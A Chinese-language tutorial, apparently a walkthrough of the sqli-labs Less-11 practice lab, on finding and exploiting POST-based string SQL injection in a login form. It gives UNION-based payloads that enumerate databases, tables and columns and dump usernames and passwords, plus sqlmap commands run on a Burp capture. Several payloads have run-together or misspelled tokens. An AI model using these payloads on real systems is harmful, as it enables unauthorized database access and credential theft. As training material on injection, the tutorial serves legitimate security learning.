版权归作者所有,转载请注明出处
POST字符型SQL注入
0x01
1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
2.GET和POST的区别:
语义上的区别,get用于获取数据,post用于提交数据。
GET - 从指定的资源请求数据。
POST - 向指定的资源提交要被处理的数据
get参数有长度限制(受限于url长度,具体的数值取决于浏览器和服务器的限制),而post无限制
3.如何判断是否存在POST注入
主要是判断输入框是否存在注入,直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),如果直接出错了,说明存在注入漏洞,如果没有,那么还需要进一步确定。如果页面有多个输入框,这时要分别确定是否都存在注入漏洞。
0x02
第一步判断是够存在POST型注入点
(1)访问目标网站的Less-11
(2)在Firefox浏览器中按F12,查浏览器前端表单提交元素可以看到用户名和密码两个参数分别为uname和passwd
(3)以admin/cc尝试登录,显示报错
(4)以admin/admin尝试登录,会将登录成功结果反馈在前端页面
第二步判断是否存在字符型/数字型注入
(1)uname=1&passwd=1 或者 uname=1&passwd=1" 此时提示登录失败(回显正常)
(2)uname=1&passwd=1’ 此时提示错误,得出结论是单引号的字符型注入
从报错信息可以推测出数据库的查询语句有可能是如下形式:
select username,passwordfrom table_name where username='$_POST['uname']'andpassword='$_POST['passwd']'limit0,1可在目标网站查看源码得知:传入的参数username、password是用单引号引起来的,而且使用and来进行组合
第三步POST手工注入
(1)在burpsuit抓取到的包里面利用union语句联合查询来获取用户名和数据库名 uname=1&passwd=1' union select user(),database()--+
此时可以在浏览器前端获取相应的用户名和数据库名
(2)在burpsuit抓取到的包里面利用union语句联合查询来获取表名
uname=1&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+如果在burpsuit里开启reponse响应包的抓取,可以在burpsuit里面查看到表明信息
在burpsuit抓取到的包里面利用union语句联合查询来获取字段名
uname=1&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security'andtable_name='users'--+此时可以在浏览器前端获取相应的字段名
可参考以下语句进行其他信息的猜解:
猜解列数:
XXXXX orderby2#&passwd=1获取数据库,用户:
XXXXX unionselectdatabase(),user() #&passwd=1获取表:
获取全部数据:
XXXXX unionselect1,group_concat(table_name) from information_schema.tableswhere table_schema=database() #&passwd=1获取一条数据:
XXXXX union select1,table_name from information_schema.tables where table_schema=database() limit0,1 #&passwd=1获取全部数据:
XXXXX union select1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=1获取一条数据:
XXXXX union select 1,column_name from information_schema.columnes where table_name='users' limit 0,1 #&passwd=1
获得列值:
获取全部数据:
XXXXX union select group_concat(username),group_concat(password) from users #&passwd=1获取一条数据:
XXXXX union select username,password from users limit 0,1 #&passwd=1第四步结合SQLMap软件与Burpsuit的抓包信息进行工具注入
(1)以test/test登录Less-11,然后burpsuit抓包并保存到aa.txt文档
(2)打开sqlmap,开始进行注入,sqlmap -r aa.txt – dbs(注意aa.txt文档的保存路径下执行命令或者把aa.txt的路径指定完整)
此时成功获取数据库信息
然后分别使用sqlmap的其他参数来进行SQL注入即可
